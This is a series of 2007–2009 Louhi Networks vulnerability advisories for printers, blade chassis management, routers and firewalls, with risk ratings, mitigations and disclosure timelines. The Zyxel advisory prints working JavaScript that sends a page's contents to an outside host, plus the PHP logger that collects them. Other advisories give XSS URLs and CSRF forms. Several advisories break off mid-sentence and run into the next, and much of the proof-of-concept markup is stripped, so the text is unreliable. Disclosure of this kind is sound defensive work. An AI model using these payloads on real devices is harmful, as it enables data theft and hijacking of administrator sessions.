Xerox WorkCentre multiple models Denial of Service

[Henri Lindberg - Smilehouse Oy]

  Louhi Networks Information Security Research
   Security Advisory


 Advisory: Xerox WorkCentre multiple models Denial of Service
 Release Date: 2009/08/25
Last Modified: 2009/08/25
  Authors: Juho Ranta
   [juho.ra...@louhi.fi]
   Henri Lindberg, CISA
   [henri.lindb...@louhi.fi]

  Application: Xerox WorkCentre
 Verified: Controller+PS ROM Version 1.202.1 and 1.202.5
  Devices: Xerox WorkCentre 7132,
   WC7232/7242, WC7328/7335/7345/7346 and
   WC7425/28/35
  Attack type: Denial of Service
 Risk: Low
Vendor Status: Patch available for WC7232/7242
   References: http://www.louhinetworks.fi/advisory/xerox_0908.txt

http://www.cert.fi/haavoittuvuudet/2009/haavoittuvuus-2009-081.html

http://www.support.xerox.com/go/results.asp?Xtype=download&prodID=WC7232_WC7242&Xlang=en_US&Xcntry=USA


Overview

   Quote from http://www.xerox.com/
   "The Xerox WorkCentre 7132 multifunction is the affordable transition
to the next level of productivity for your office. One easy-to-use
device offers powerful printing, copying, scanning, and faxing. The
WorkCentre 7132 also gives you color when you need it, for critical
documents and for added impact. Robust functions, straightforward
operation, and color within your budget . that should keep everyone
smiling and productive."

During a brief assessment performed for Xerox WorkCentre 7132 it was
discovered that LPD daemon implementation contains a weakness
related  to robustness of LPD protocol handling. Attacker can crash
the whole device with a relatively simple attack. Recovering from
the denial-of-service condition requires power cycling the device.

Details

Device freezes when it is flooded with LPD requests having oversized
queue name length AND other features of the device are accessed
during the attack.

The LPD daemon terminates the connection when it receives a request
with an oversized queue name. The required minimum length for this
seems to vary. Our proof-of-concept attack sends ASCII character
blocks to the LPD daemon until connection is closed, while sending
HTTP requests to the web administration interface.

By flooding the device with these invalid LPD requests and accessing
other features at the same time, the device can be crashed. This was
verified with two different firmware versions (1.202.1 and 1.202.5).

It must be noted that successful denial-of-service attack requires
the steps described above. Sending requests with oversized queue
names does crash the device by itself.

Due to the black box nature of the performed attack against a
production device, we were not able to determine the exact root
cause for the crash. According to vendor this is caused by a memory
leak, but further exploitability or memory corruption has neither
been confirmed nor denied.

Vulnerability was detected with an LPD protocol implementation
written for Sulley Fuzzing Framework.


Preconditions

*LPD daemon is enabled.
*Attacker has network access to the LPD daemon
*Attacker has network access to other features OR
*Valid user uses the device on location


Symptoms of successful attack

One or more of the following:
 *Control panel lights are blinking, no response to pushing buttons
 *LCD panel displays error message
 *LCD panel displays a halted progress bar
 *Switching power off from on/off button takes more than 10 seconds

Proof of Concept:

Python code available at:
http://www.louhinetworks.fi/advisory/xerox/exploit.py
http://www.louhinetworks.fi/advisory/xerox/webInterface.py

Pictures of a crashed control panel (Finnish language):
http://www.louhinetworks.fi/advisory/xerox/error1.jpg
http://www.louhinetworks.fi/advisory/xerox/freeze1.jpg

Web interface requests are performed with a separate Python
process/script in order to achieve more reliable exploitation under
Windows.

Mitigation:

Preventive
 *Install patch from vendor
 *Configure IPS signature for LPD requests with oversized queue
  names
 *Allow only trusted users to access LPD daemon
 *Disable LPD daemon

Detective
 *Configure IDS signature for LPD requests with oversized queue
  names

Disclosure Timeline (selected dates):

   X 2008- Vulnerability discovered
   3.  September 2008- Contacted CERT-FI by email describing the
   issue with Xerox WC 7132
   20. November  2008- CERT-FI confirms vendor has been notified
   21. January   2009- Vendor is unable to reproduce the issue,
   but continues trying
   22. January   2009- Vulnerability reproduced, vendor investigates
   other devices. Apologizes slow response.
   17. June  2009- Vendor has identified vuln

IBM BladeCenter Advanced Management Module Multiple vulnerabilities

[Henri Lindberg - Smilehouse Oy]

   Louhi Networks Information Security Research
Security Advisory


 Advisory: IBM BladeCenter Advanced Management Module
   Multiple vulnerabilities
   (XSS type 2 & 1, CSRF, Information Disclosure)
 Release Date: 2009-04-09
Last Modified: 2009-04-09
  Authors: Henri Lindberg [henri.lindb...@louhi.fi], CISA

   Device: IBM BladeCenter H AMM
   Main application: BPET36H
   Released: 03-20-08
   Rev:  54
 Risk: Low - Moderate
   High if Web Access is in active use and
   access to login page is unrestricted
Vendor Status: Vendor notified, patch available.
   References: http://www.louhinetworks.fi/advisory/ibm_090409.txt

Affected devices (from vendor):
  IBM BladeCenter E (1881, 7967, 8677)
  IBM BladeCenter H (7989, 8852)
  IBM BladeCenter HT (8740, 8750)
  IBM BladeCenter S (1948, 8886)
  IBM BladeCenter T (8720, 8730)
  IBM BladeCenter JS12 (7998)
  IBM BladeCenter JS21 (7988, 8844)
  IBM BladeCenter JS22 (7998)
  IBM BladeCenter HC10 (7996)
  IBM BladeCenter HS12 (8014, 1916, 8028)
  IBM BladeCenter HS20 (1883, 8843)
  IBM BladeCenter HS21 (8853, 1885)
  IBM BladeCenter HS21 XM (7995, 1915)
  IBM BladeCenter LS20 (8850)
  IBM BladeCenter LS21 (7971)
  IBM BladeCenter LS41 (7972)
  IBM BladeCenter QS21 (0792)
  IBM BladeCenter QS22 (0793)

Overview:

   Quotes from

http://www-03.ibm.com/systems/bladecenter/hardware/chassis/bladeh/index.html

   "In today’s high-demand enterprise environment, organizations
need a reliable infrastructure to run compute-intensive
applications with minimal maintenance and downtime.
IBM BladeCenter H is a powerful platform built with the
enterprise customer in mind, providing industry-leading performance,
innovative architecture and a solid foundation for virtualization."

   "Provides easy integration to promote innovation and help manage
growth, complexity and risk"

   During a quick overview of BladeCenter AMM web access, it was
   discovered that web administration interface has multiple
   vulnerabilities regarding input and request validation.

Details:

   Cross Site Scripting
   

   Type 2:
   ---
   Most serious issue discovered was the persistent XSS
   vulnerability on the event log page resulting from
   displaying unsanitized user input received from an invalid
   login attempt.

   This can be exploited without valid credentials or social
   engineering. Access to device administration IP address is
   needed and an administrator has to view event log at some point,
   however.

   Successful attack requires that an administrator visits event
   log page, thus enabling the attacker to control the chassis
   and blade configuration by running the injected content which
   is interpreted by the administrator's browser.

   For example, all blades can be shut down or new admnistrative
   users can be added, depending on administrator's access rights.

   Unsuccessful login attempts are displayed without HTML encoding
   or input sanitation in the event log. It is possible to inject
   a reference to a remote javascript file by using eg following
   username:
   

   Notes:
   If user input contains , dynamic javascript is spilled
   out on the page and it is quite easy to mess up formatting
   of the event log page.

   Log can be cleared by an authenticated administrator from URL:
   http://1.2.3.4/private/clearlog

   Event log javascript format:
   parent.LogEntryArray[i++] = new LogEntry( "1","2","Audit
   ","SN#420420313370","09/09/08","04:20:42","Remote login failed
   for user '' from
   Web at IP 1.2.3.4");

   HTML-injection can be performed for example with following
   "username": Mallory

   This results in:
   Remote login failed for user '
   Mallory' from Web at IP 1.2.3.4

   Entries from event log are also displayed on the AMM Service
   Data page.

   Type 1:
   ---
   File manager displays user input on the page "as is".

   Successful exploitation requires social engineering
   an authenticated administrator to visit the hostile URL.

   Example URL:
   http://1.2.3.4/private/file_management.ssi?
   PATH=/etc">http://l7.fi";>

   Information Disclosure
   ==

   A readonly operator (for example, a Blade operator with
   a scope assigment to one Blade) can view security
   permissions of other users (access roles and scopes) by
   forcefully browsing to their respective login profile pages:

   http://1.2.3.4/private/login.ssi?WEBINDEX=&JUNK=1
   where  is the assigned integer value (1..12) of the user
   account

   Cross Site Request Forgery
   ==

   BladeCenter AMM does not validate the origin of an HTTP

Rittal CMC-TC Processing Unit II multiple vulnerabilities

[Henri Lindberg - Smilehouse Oy]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

  Louhi Networks Oy
   -= Security Advisory =-


  Advisory: Rittal CMC-TC Processing Unit II
multiple vulnerabilities
  Release Date: 2009-03-23
 Last Modified: 2009-03-22
   Authors: Henri Lindberg, CISA
[henri d0t lindberg at louhi d0t fi]

   Application: Rittal CMC-TC PU II Web management

   Devices: CMC-TC PU II DK 7320.100 SW: V2.45 HW: V3.01,
possibly other Rittal products

  Attack type : XSS Type I, XSS Type II, Session prediction,
Remote command execution in default configuration
  Severity: Moderate
 Vendor Status: Vendor notified.
Patch already available for XSS vulnerabilities.
Other vulnerabilities will be addressed in a future
version, no release date set.
References: http://www.louhinetworks.fi/advisory/Rittal_090323.txt


Overview:
   Quote from http://www.rimatrix5.com/ :
   "The Computer Multi Control Top-Concept (CMC-TC) from Rittal is
a complete security management for preventive protection to guard
against consequential costs, and is the central organisational unit
for linking to the facility management.
...
Processing Unit II (PU II) the nerve centre of the CMC-TC monitoring
system. The PU II is the coordinator between the sensor unit and the
network. It is configured via the integral Web server."

Details:

Several vulnerabilities were identified from CMC-TC PU II web
interface. These include XSS Type I, XSS Type II, weak session
management and insecure default configuration.

XSS Type 1:
---
Web application fails to validate and/or htmlencode user input when
handling erroneous requests. This allows attacker to inject HTML and
client-side scripts to victim's browser by creating suitable links.

This vulnerability cannot be used for session hijacking, because
CMC-TC PU II requires each valid request to contain current session
ID as URL parameter. Requests without session ID are redirected to
the login page. Therefore only phishing-type attacks or attacks
against user's browser are possible.

Successful exploitation requires that attacker can lure or force
the user to follow the malicious link.

XSS Type 2:
---
Web application fails to sanitize and/or htmlencode user input on
system information page. This allows attacker to backdoor the device
with HTML and browser interpreted content (such as ECMAscript
dialects or other client-side scripts) as the content is displayed
always after login. Persistent XSS allows attacker to modify
displayed content or to change the victim's password (since old
password is not required for password changes).

Succesful exploitation requires access to the web management
interface either with valid credentials or hijacked session.

Weak session management:

CMC-TC PU II uses unixtime from login moment as session identifier,
thus having insufficient randomization.

If administrator login time is known and session is still valid, it
can be brute-forced with relatively little effort. Proof-of-concept
tool is provided, but any web application security tool (such as
Burp Intruder) can be used for this.

Successful exploitation requires that administrator login time is
known (or a reasonably accurate guess can be made) and the session
is still  active.

Insecure default configuration:
---
If default administrator password is not changed, attacker can run
arbitrary commands and modify the system software by uploading
malicious  update scripts via ftp. See update packet script contents
for detailed information about the update process (eg update_l.sh).

Software update packet expects user to have default password
in place, since ftp-upload script contains hardcoded default
password. The update will fail with no errors if it's been changed.

What makes this interesting is the fact that the device does not
offer operating system level access through any of the other
management interfaces. Telnet and SSH both offer a menu based
administration interface.

Successful exploitation requires default administrator password and
access to ftp port of the target device.

Remediation:
   * Restrict unauthorized network access to device
   * Change default passwords (instructions provided in Operation
 Manual)
   * Install patched Version 2.60a
   * Update future patch version as soon as available
   * Configure web interface to 'view only'
   * Review device configuration after an administrator has been let go
   * Do not follow untrusted links

Timeline:
   * 2008-xx-xx Issues discovered

   * 2009-02-25 Contacted vendor via e-mail

   * 2009-03-02 C

A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability

[Henri Lindberg - Smilehouse Oy]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

   Louhi Networks Information Security Research
Security Advisory


 Advisory: A-Link WL54AP3 and WL54AP2 CSRF+XSS vulnerability
 Release Date: 2008/10/31
Last Modified: 2008/10/28
  Authors: Jussi Vuokko, CISSP [EMAIL PROTECTED]
   Henri Lindberg [EMAIL PROTECTED]

   Device: A-Link WL54AP3 and WL54AP2 (any firmware)
 Severity: CSRF and XSS in management interface
 Risk: Moderate
Vendor Status: Vendor has released an updated version
   References: http://www.louhinetworks.fi/advisory/alink_081028.txt


Overview:

   Quote from http://www.a-link.com/
   "WLAN Access point 54MB, 4-port
Wlan Access point, wireless 54Mbps, DSSS, 802.11g-standard based and
it's compatible also with other manufacturers cards."

   During an audit of A-Link WLAN54AP3 it was discovered that a cross
   site request forgery vulnerability exists in the management
   interface. It is possible for an attacker to perform any
   administrative actions in the management interface, if victim
   can be lured or forced to view malicious content. These administrative
   actions include e.g. changing admin user's username and password,
   DNS settings etc.

   In addition, it was discovered that no input validation or output
   encoding is performed in management interface, thus making it
   vulnerable to cross-site scripting.

   By default admin password is blank and no authentication is performed
   for requests to administrative interface. As ordinary consumers usually
   use out-of-the-box settings, this vulnerability offers same kind of
   phishing possibilities as used in Banamex attacks[1].

   A-Link WLAN54AP2 (EOL) is vulnerable to this threat as well.

   [1] http://www.google.fi/search?q=banamex+phishing+dns+poison


Details:

   A-Link WLAN54AP3 does not validate the origin of an HTTP request. If
   attacker is able to make user view malicious content, the WLAN54AP3
   device can be controlled by submitting suitable forms. Attacker is
   effectively acting as an administrator.

   Successful attack requires that the attacker knows the management
   interface address for the target device (default IP address is
   192.168.1.254). As the management interface does not have logout
   functionality, user can be vulnerable to this attack even after
   closing a tab containing the management interface (if user does not
   close the browser window or clear cookies and depending on browser
   behaviour) or if default blank password is used.


Proof of Concept:

   CSRF:

   Example form (changes DNS servers, enables WAN web server access
   and changes user's username and password):

   
   
   http://192.168.1.254/goform/formWanTcpipSetup";
method="post" name="wan">
   
   
   
   
   
   
   http://192.168.1.254/goform/formPasswordSetup";
method="post" name="password">
   
   
   
   
   
   

   XSS:

   Add following content to management interface's Management - DDNS -
   Domain Name:

   "">http://l7.fi";>http://en.wikipedia.org/wiki/Cross-site_request_forgery

  Perform an input validation and/or an output encoding. More information:
  http://en.wikipedia.org/wiki/Cross_site_scripting

  Use secure out-of-the-box configuration (for example generate
  default passwords based on device serial or MAC address using
  a secure cryptographic algorithm).


Disclosure Timeline:

   13. September 2008 - Contacted A-Link by email
   28. October 2008   - Vendor released an updated version
   31. October 2008   - Advisory was released


Copyright 2008 Louhi Networks Oy. All rights reserved.
-BEGIN PGP SIGNATURE-

iEYEAREIAAYFAkkLDf0ACgkQ3TZNEGeZkm677QCdGIBR9jySnDlKCmtN7eDMUEGM
y6sAn26m+4S2I50fuDFxBlaQTO6kqSTK
=XEbb
-END PGP SIGNATURE-

Checkpoint VPN-1 UTM Edge cross-site scripting

[Henri Lindberg - Smilehouse Oy]

  Louhi Networks
 Security Advisory


 Advisory: Checkpoint VPN-1 UTM Edge cross-site scripting
 Release Date: 2008/03/06
Last Modified: 2008/03/06
  Authors: Henri Lindberg, Associate of (ISC)²
   [EMAIL PROTECTED]

  Application: Checkpoint VPN-1 Edge W Embedded NGX 7.0.48x
   (patched in version 7.5.48)
  Devices: Checkpoint VPN-1 UTM Edge
  Attack type: Cross site scripting (non-persistent)
 Risk: Low
Vendor Status: Vendor has released an updated version
   References: http://www.louhi.fi/advisory/checkpoint_080306.txt


Overview:

   Quote from http://www.checkpoint.com/
   "VPN-1 UTM Edge appliances deliver unified threat management to
enterprises with branch offices and simplify security deployments
and manageability. VPN-1 UTM Edge appliances consolidate proven
enterprise-class technology into a single branch office solution
that does not compromise the corporate network and eliminates the
branch office as your weakest link. As part of Check Point's Unified
Security Architecture, VPN-1 UTM Edge can enforce a global security
policy and allows administrators to manage and update thousands of
appliances as easily as managing one."

   Insufficient input validation and output encoding on the login page
   allows attacker to perform html-injection by posting suitable string
   to the login form handler. The injection leads to reflected
   pre-authentication cross site scripting.


Details:
   Form based authentication is used only when device is accessed using
   HTTP. Authentication over HTTPS uses HTTP basic authentication.

   The device does not accept the parameters in a GET request, POST
   request has to be used instead - exploiting the XSS vulnerability
   requires therefore a bit more effort compared to ordinary GET based
   reflected cross site scripting vulnerability.

   The current version can be checked from
   http://xxx.xxx.xxx.xxx/pub/test.html where xxx.xxx.xxx.xxx is LAN IP
   address of the device. The page also displays current product key.

Vendor response:

   "Once users register the appliance and connect to the service center
   ([EMAIL PROTECTED] appliances), the latest firmware is automatically
   downloaded to their appliance. For UTM-1 Edge appliances, the latest
   firmware version can be downloaded from the Check Point download
   center. Currently, this is version 7.5.48 that does not contain the
   reported issue. We believe that customers are not exposed to this
   issue."

Proof of Concept:



http://192.168.10.1";
style="display:none">









Solution:

   Update to version 7.5.48


Disclosure Timeline:

   19.  February 2008- Contacted Checkpoint by email
   20.  February 2008- Vendor response.
   6.  March 2008- Advisory was released

Copyright 2008 Louhi Networks Oy. All rights reserved.

Buffalo AirStation WHR-G54S CSRF vulnerability

[Henri Lindberg - Smilehouse Oy]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

  Louhi Networks Oy
   -= Security Advisory =-


  Advisory: Buffalo AirStation WHR-G54S Web Management CSRF
vulnerability
  Release Date: 2007-09-07
 Last Modified: 2007-09-07
   Authors: Henri Lindberg, Associate of (ISC)²
[henri d0t lindberg at louhi d0t fi]

   Application: Buffalo AirStation Web Management

   Devices: WHR-G54S Ver.1.20, possibly other Buffalo products
  Severity: Cross site request forgery in management interface
  Risk: Moderate
 Vendor Status: No response from vendor.
References: http://www.louhi.fi/advisory/buffalo_070907.txt


Overview:

During cursory inspection of WHR-G54S it was discovered that a cross
site request forgery vulnerability exists in the management
interface. Thus, it is possible for an attacker to perform any
administrative action in the management interface. These include
e.g. changing administrative password or adding new firewall rules.


Details:

Buffalo AirStation WHR-G54S Ver.1.20 device management interface
does not validate the origin of an HTTP request. If attacker is able
to make user visit a hostile web page, a  device can be controlled
by submitting suitable forms. It is possible to add new users for
example.

Successful attack requires that the attacker knows the management
interface address for the target device. As authentication is done
using HTTP Basic authentication, exploiting this vulnerability
requires more effort compared to forms authentication.


Proof of Concept:


  
http://192.168.11.1/cgi-bin/cgi?req=inp&res=ap.html
"style="display:none">

 
 
 
 
 
 

  


Note: ropass value is reversed edit_ropass value.


  
http://192.168.11.1/cgi-bin/cgi?req=inp&res=filter_ip.html";
style="display:none">












1.1.1.1 = attacker's IP address


Workaround:

Do not browse untrusted websites while using the management
interface.

Log out after administering the device.

More information

http://en.wikipedia.org/wiki/Cross-site_request_forgery

Disclosure Timeline:

XX  July 2007   - Discovered the issue
15. August 2007 - Contacted Buffalo
17. August 2007 - Contacted Buffalo again.
7.  September 2007  - No response from Vendor.
7.  September 2007  - Advisory released


Copyright 2007 Louhi Networks Oy. All rights reserved.

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (MingW32)

iEYEAREIAAYFAkbhNJIACgkQ3TZNEGeZkm50SACcCHiOtcfCycfYcxr3lsQPh/J3
Aa8AoKVr6BmKMamG3a7mQCAvO0FV+6y6
=+E8f
-END PGP SIGNATURE-

Zyxel Zywall 2 multiple vulnerabilities

[Henri Lindberg - Smilehouse Oy]

-BEGIN PGP SIGNED MESSAGE-
Hash: SHA256

 Louhi Networks Oy
  -= Security Advisory =-


 Advisory: Zyxel Zywall 2 Multiple vulnerabilities
 Release Date: 2007-08-10
Last Modified: 2007-08-10
  Authors: Henri Lindberg, Associate of (ISC)²
   [EMAIL PROTECTED]

  Application: ZyNOS Firmware Version: V3.62(WK.6) | 06/16/2004
  Devices: Zyxel Zywall2 (possibly all other Zyxel devices using
   the same firmware)
 Severity: Moderate
   Impact: Persistent cross site scripting, cross site request
   forgery, persistant denial of service
Vendor Status: Vendor notified
   References: http://www.louhi.fi/advisory/zyxel_070810.txt


Overview:

   During an audit of Zyxel Zywall 2 it was discovered that a cross
   site request forgery and persistent cross site scripting
   vulnerability exists in the management interface.  Thus, it is
   possible for an attacker to perform any administrative actions in
   the management interface, if a logged-in/authenticated user has been
   enticed to visit a malicious web site. These actions include e.g.
   changing dns server address or other security critical configuration
   items.

   It was also discovered that it is possible to "brick" the device by
   submitting invalid configuration to the device, thus performing a
   persistant denial of service attack against it.

Details:

   Embedded device management interface does not validate the origin
   of an HTTP request. If attacker is able to make an authenticated
   user visit a hostile web page, a device can be controlled by
   submitting suitable forms. It is possible to steal information from
   the device and modify the configuration. See provided
   proof-of-concept code for more information.

   Successful attack requires that the attacker knows the management
   interface address for the target device. As the management interface
   is most usually located at the default IP address and might even have
   default password in place, performing an successful attack is not far
   fetched.

   By submitting invalid configuration to the management interface it is
   possible to perform a persistant denial of service attack against the
   device. After receiving invalid configuration, the device will reboot
   and enter an infinite reboot loop. Powering off the device, or
   pressing reset button will not help. It has not been researched if
   the device can be restored from this state (it does not have any
   reset jumpers or battery powered memory). From an ordinary consumer's
   point-of-view, the device is compeletely useless. No proof-of-concept
   code will be released, but finding this vulnerability is trivial.

More information:
   http://en.wikipedia.org/wiki/Cross-site_request_forgery

Proof of Concept:

  Include a random user-specific token in forms.

  Example form (exploits persistent XSS):

  
  
  http://192.168.1.1/Forms/General_1";>
  http://nx.fi/X'>"
  
  
  
  
  
  

X:
- --
document.write("Security Updates - http://www.zyxel.com");

function getPage(){
i = 0;
data = encodeURIComponent(document.body.innerHTML);


while (i < data.length)
{

tmp = data.substr(i, 4096);
(new Image()).src = "http://nx.fi/xss/getinfo.php?page="; + tmp;
i += 4096;
}

}

setTimeout("getPage()", 1000);
- --

getinfo.php:
- --
";
foreach($_REQUEST as $tmp) {
$data .= htmlspecialchars(urldecode($tmp));
}

$data .= "";

$myfile = "log.html";
$handle = fopen($myfile, 'a');
fwrite($handle, $data);
fclose($handle);

}


?>
- --

Notice that you 'system name' variable is limited in length, so you'll
need a relatively short URL.

Workaround:

Change administration password and default IP address.
Perform administration using SSH.


Disclosure Timeline:

  May  10   2007- Contacted Zyxel by email
  May  11   2007- Vendor responded by email
  June  7   2007- Vendor stated that this not an urgent issue
  June 28   2007- Provided vendor with a proof-of-concept attack
  August 10 2007- Advisory released


Copyright 2007 Louhi Networks Oy. All rights reserved.
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.5 (MingW32)

iEYEAREIAAYFAka8P3UACgkQ3TZNEGeZkm5eGACffzkmceMKroY4VTKxPX/ec5eH
0AsAn1uIxklFttYYlviEOJ42EXP0yTH1
=06kW
-END PGP SIGNATURE-